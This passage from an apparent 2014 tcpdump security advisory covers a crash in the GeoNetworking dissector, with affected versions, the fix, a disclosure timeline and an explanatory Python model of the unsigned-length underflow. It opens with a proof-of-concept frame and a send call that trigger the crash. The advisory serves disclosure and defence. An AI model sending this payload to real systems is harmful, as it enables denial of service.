geonet_frame = "\x00\x1f\xc6\x51\x07\x07\x07\x07\x07\x07\x07\x07\x07\x07\xc6\x51\x07\x07\x07\x07\x07\x07\xef\x06\x07\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\x00\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x01\x01\x01\x99\x80\x00\x35\x00\x29\x16\xa5\x01\x76\x01\x00\x00\xff\x00\x00\x01\x00\x00\x00"
s.send(geonet_frame)

4. Affected versions
Affected versions are 4.5.0 through 4.6.2 (segfaults were reproducible in versions up to 4.6.1 on Ubuntu 14.04, but not reliably in 4.6.2. Code audit showed that unsafe computations are performed in 4.6.2, but the trigger frame might need to look different).

5. Fix
The problem is fixed in the upcoming version tcpdump 4.7.0

6. Advisory Timeline
2014-11-08 Discovered
2014-11-09 Requested CVE
2014-11-11 Reported to vendor by email
2014-11-12 Vendor made a fix available as repository patch
2014-11-13 CVE number received
2014-11-13 Published CVE advisory

7. Credit
The issue was found by
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.
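The crash mechanism in section 3 is a length counter of unsigned type being decremented by sizes read from the packet without first checking that enough bytes remain, after which the wrapped value is handed to a routine that prints that many bytes. The following is an added example, not tcpdump's code, that models the bug class in Python with a 32-bit mask standing in for a C u_int; the toy element layout, the function names and the two constructed frames are assumptions made for the example and do not reproduce geonet_print's real arithmetic.

```python
U32_MAX = 0xFFFFFFFF  # a C u_int wraps around at this value


def u32_sub(length, n):
    """Unchecked C-style `length -= n` on an unsigned 32-bit counter:
    consuming more than remains silently wraps to a value near 4 GiB."""
    return (length - n) & U32_MAX


def checked_sub(length, n):
    """What a dissector should do instead: refuse to consume more than remains."""
    if n > length:
        raise ValueError(f"truncated packet: need {n} bytes, {length} remain")
    return length - n


def walk_elements(frame, checked):
    """Toy dissector built on the pattern the advisory describes: a fixed
    header followed by elements whose size is read from the packet itself.
    Returns the length a hex-dump routine would then be asked to print,
    which is the value that, once wrapped, sends the printer past the buffer."""
    sub = checked_sub if checked else u32_sub
    length, pos = len(frame), 0
    length = sub(length, 2)  # fixed 2-byte header
    pos += 2
    while pos < len(frame):
        elem_len = frame[pos]  # size byte under the sender's control
        length = sub(length, 1 + elem_len)
        pos += 1 + elem_len
    return length


def is_truncated(frame):
    """True when the checked walk rejects the frame as inconsistent."""
    try:
        walk_elements(frame, checked=True)
    except ValueError:
        return True
    return False


# Constructed frames: a consistent one, and one whose last element claims
# 16 bytes of data when only 2 remain in the capture.
GOOD_FRAME = b"\x01\x02" + b"\x03abc"
BAD_FRAME = b"\x01\x02" + b"\x03abc" + b"\x10xy"

if __name__ == "__main__":
    print("good, unchecked:", walk_elements(GOOD_FRAME, checked=False))
    print("bad, unchecked: ", walk_elements(BAD_FRAME, checked=False))
    print("bad, checked rejects:", is_truncated(BAD_FRAME))
```

The unchecked walk over BAD_FRAME returns 4294967282 bytes to print from a 9-byte buffer, which is the shape of the segfault the advisory reports; the checked variant raises on the same input, and the guard costs one comparison per decrement.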